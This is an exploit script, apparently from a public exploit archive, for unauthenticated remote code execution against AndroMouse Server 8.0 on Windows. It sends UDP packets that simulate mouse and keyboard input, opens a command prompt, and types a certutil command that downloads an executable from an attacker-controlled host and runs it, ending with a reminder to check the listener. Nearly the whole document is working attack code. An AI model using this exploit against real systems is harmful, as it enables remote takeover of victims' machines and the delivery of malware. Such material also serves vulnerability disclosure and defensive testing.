# Exploit Title: AndroMouse Server 8.0 - Remote Code Execution
# Date: 03/07/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://andromouse.com
# Software Link: https://andromouse-server.en.lo4d.com/windows
# Version: 8.0
# Tested on: Windows 10

'''
Description:

Exploits AndroMouse Server 8.0's unauthenticated UDP interface to simulate
mouse/keyboard actions and execute malicious commands via certutil.

'''



import socket
import time

TARGET_IP = "192.168.8.104"
TARGET_PORT = 8888
LHOST = "192.168.8.103"
PAYLOAD = "shell.exe"

def send_udp(message, delay=0.3):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(message.encode(), (TARGET_IP, TARGET_PORT))
    time.sleep(delay)

print("[*] Positioning mouse...")
send_udp("mouse_move|-9999|9999", 0.5)
send_udp("mouse_move|15|-10", 0.5)
send_udp("mouse_click|0", 0.5)

print("[*] Opening CMD...")
for char in "cmd":
    send_udp(f"keyboard_char|{char}")
send_udp("keyboard_char|\x0a", 2)

print(f"[*] Executing payload from {LHOST}...")
for char in f"certutil -urlcache -f http://{LHOST}/{PAYLOAD} {PAYLOAD} &&
{PAYLOAD}":
    send_udp(f"keyboard_char|{char}")
send_udp("keyboard_char|\x0a")

print("[+] Payload execution complete - check your listener!")